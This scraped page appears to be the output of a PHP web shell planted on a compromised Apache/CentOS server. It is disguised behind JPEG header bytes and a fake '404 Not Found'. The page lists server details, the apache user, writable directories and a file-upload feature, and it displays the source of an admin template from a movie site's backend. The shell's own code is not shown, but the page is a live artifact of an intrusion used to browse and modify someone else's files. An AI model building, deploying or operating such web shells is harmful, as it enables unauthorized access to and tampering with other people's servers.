ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/netphim/code/admin/server/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/netphim/code/admin/server/list_tpl.php
<div class="card">
    <div class="card-header">
        List server
        <div class="card-tools"><a href="javascript:void(0);" onclick="open_popup('?act=admin&code=server&type=post','Post server')"><i class="fas fa-plus"></i> Add new</a></div>
    </div>
    <div class="card-body">
        <a href="javascript:void(0);" class="btn btn-primary btn-sm mb-2" id="update_pos"><i class="fa fa-bars"></i> Update position
        </a>
        <form action="" method="post" id="form_quick_update">
            <input type="hidden" name="type2" value="">
        <table class="table table-bordered">
            <tr><th>Server position</th><th>Server name</th><th>server link</th><th>server location</th><th>server status</th><th>#</th></tr>
            <?php echo $txt_list;?>
        </table>
        </form>
    </div>
</div>
<script>
    $('.delete_server').click(function(){
        if(confirm('Are you sure?')) {
            var server_id = $(this).attr('rel');
            $.ajax(
                {
                    url: '?act=admin&code=server&type=delete&server_id=' + server_id,
                    success: function (result) {
                        $('#tr_server_'+server_id).remove();
                    }
                }
            );
        }
    });

</script>

ZeroDay Forums Mini